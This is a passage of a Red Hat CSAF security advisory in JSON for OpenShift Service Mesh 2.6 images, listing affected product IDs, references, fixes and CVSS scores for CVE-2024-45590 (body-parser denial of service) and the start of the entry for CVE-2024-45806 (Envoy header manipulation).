"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
},
{
"acknowledgments": [
{
"names": [
"Mike Whale"
]
},
{
"names": [
"James Force"
],
"organization": "Red Hat",
"summary": "This issue was discovered by Red Hat."
}
],
"cve": "CVE-2024-45806",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2024-09-20T00:40:20.976812+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313683"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Envoy that allows external clients to manipulate Envoy headers, potentially leading to unauthorized access or other malicious actions within the mesh. This issue arises due to Envoy\u0027s default configuration of internal trust boundaries, which considers all RFC1918 private address ranges as internal. The default behavior for handling internal addresses in Envoy has been changed. Previously, RFC1918 IP addresses were automatically considered internal, even if the internal_address_config was empty. The default configuration of Envoy will continue to trust internal addresses while in this release and it will not trust them by default in next release. If you have tooling such as probes on your private network which need to be treated as trusted such as changing arbitrary x-envoy headers, please explicitly include those addresses or CIDR ranges into `internal_address_config`. Successful exploitation could allow attackers to bypass security controls, access sensitive data, or disrupt services within the mesh, like Istio.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Potential to manipulate `x-envoy` headers from external sources",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat\u0027s CVSS score and impact are specific to our product and may not match those of upstream. This is due to how envoy is configured and used within our OpenShift Service Mesh product.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
